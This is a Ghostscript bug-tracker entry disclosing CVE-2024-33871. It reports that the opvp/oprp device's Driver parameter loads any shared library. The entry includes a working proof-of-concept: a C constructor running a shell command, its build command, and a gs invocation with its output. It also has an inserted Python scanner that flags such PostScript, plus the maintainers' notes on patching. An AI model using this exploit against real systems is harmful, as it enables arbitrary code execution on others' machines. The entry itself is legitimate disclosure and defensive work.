Bug 707754

Summary: OPVP device - Arbitrary code execution via custom Driver library
Product: Ghostscript
Reporter: zhutyra
Component: Security (public)
Assignee: Chris Liddell (chrisl) <chris.liddell>
Status: RESOLVED FIXED
Severity: normal
CC: akhaitov, carnil, cbuissar, dr, jsmeix, ken.sharp, marc.deslauriers, rlescak, robin.watts, sam, till.kamppeter
Priority: P2
Version: unspecified
Hardware: PC
OS: Linux
Customer:
Word Size: ---
Attachments: patch

Description zhutyra 2024-04-21 15:27:29 UTC
Created attachment 25611: patch

The "Driver" parameter for the "opvp"/"oprp" device specifies the name of a dynamic library and allows any library to be loaded.

The patch does not allow changing this parameter after activating path control.
Comment 1 zhutyra 2024-04-21 15:29:14 UTC
Created attachment 25612: exploit

Exploit for x86_64 Linux.
```
$ gs -q -dNODISPLAY opvplib.ps
uid=1000(user) gid=1000(user) groups=1000(user)
```

The file contains a precompiled library. If it doesn't work for you or you don't want to run unknown code, you can also do it manually.
```
$ cat >lib.c <<"EOF"
#include <stdlib.h>
static void __attribute__ ((constructor)) init(void) {
    exit(system("id"));
}
EOF
$ gcc -fPIC -shared -o /tmp/lib.so lib.c
$ gs -q -dNODISPLAY -c '<< /OutputDevice /opvp /Driver (/tmp/lib.so) >> setpagedevice'
uid=1000(user) gid=1000(user) groups=1000(user)
```
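One way to triage PostScript jobs for the pattern reported above, as an added example that is not part of this report or of Ghostscript: a small scanner (`tokenize` and `scan` are my names) that flags page-device dicts handing a library path to /Driver. It assumes only the opvp/oprp devices consume /Driver and also flags a dict with no OutputDevice, since the device may have been selected with -sDEVICE= on the command line; because PostScript can build such a dict dynamically, this is a triage heuristic, not a substitute for the patch or for path control.

```python
import re
# Assumption: only opvp/oprp read a library path from /Driver; "<unset>" = no OutputDevice in the dict (device may come from -sDEVICE=).
OPVP_DEVICES = {"opvp", "oprp", "<unset>"}
NAME_RE = re.compile(r"/([^\s/(){}<>\[\]%]*)")
def tokenize(ps):
    """Minimal PostScript lexer: yields (kind, value, line) for names, strings, << and >>."""
    i, line = 0, 1
    while i < len(ps):
        c = ps[i]
        if c == "%":                                    # comment runs to end of line
            nl = ps.find("\n", i); i = len(ps) if nl < 0 else nl
        elif c == "(":                                  # string: nested parens, backslash escapes
            depth, j, buf = 1, i + 1, []
            while j < len(ps) and depth:
                if ps[j] == "\\":
                    buf.append(ps[j + 1:j + 2]); j += 2; continue
                depth += (ps[j] == "(") - (ps[j] == ")")
                if depth: buf.append(ps[j])
                j += 1
            yield ("string", "".join(buf), line)
            line += ps[i:j].count("\n"); i = j
        elif c == "/":
            m = NAME_RE.match(ps, i); yield ("name", m.group(1), line); i = m.end()
        elif ps[i:i + 2] in ("<<", ">>"):
            yield ("dict", ps[i:i + 2], line); i += 2
        else:
            line += (c == "\n"); i += 1

def scan(ps):
    """Return (line, device, driver) for every dict that hands a library path to /Driver."""
    toks, stack, found, i = list(tokenize(ps)), [], [], 0
    while i < len(toks):
        kind, val, line = toks[i]
        if kind == "dict" and val == "<<":
            stack.append({})
        elif kind == "dict" and stack:                  # ">>": judge the completed dict
            d = stack.pop(); device = d.get("OutputDevice", "<unset>")
            if "Driver" in d and device in OPVP_DEVICES:
                found.append((line, device, d["Driver"]))
        elif kind == "name" and stack and i + 1 < len(toks) and toks[i + 1][0] != "dict":
            stack[-1][val] = toks[i + 1][1]; i += 1     # /Key value pair: consume the value too
        i += 1
    return found

# Constructed sample job: a benign page-device call, then the two shapes a triage scan should flag.
SAMPLE_PS = r"""%!PS
<< /OutputDevice /pdfwrite >> setpagedevice
<< /OutputDevice /opvp /Driver (/tmp/lib.so) >> setpagedevice
<< /Driver (libop(vp).so) >> setpagedevice   % device may come from -sDEVICE=oprp instead
"""
```

Running `scan(SAMPLE_PS)` reports the opvp call on line 3 and the Driver-only call on line 4, and leaves the pdfwrite call alone.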
Comment 2 Ken Sharp 2024-04-22 12:42:34 UTC
I've used the commit as supplied, thanks for that!

We're just about to start the process of a patch release; I'll amend the status when the patch is available, which will be in a week or two, unless something else comes up.

I'm anticipating this might take us longer than usual because we will probably be applying for a CVE for this and other recent patches. It's become obvious that some distros have long term support versions of Ghostscript and they only apply patches with CVEs to those codebases. So we're more or less forced to get CVEs for any serious issues in order to ensure those versions get patched.

We're keeping all the security patches private until the release, because we know someone has been mining our repository for security related patches and exploiting them. So I'm afraid that I can't point you to a commit in the repository for review :-(
Comment 3 Chris Liddell (chrisl) 2024-04-29 12:40:01 UTC
CVE-2024-33871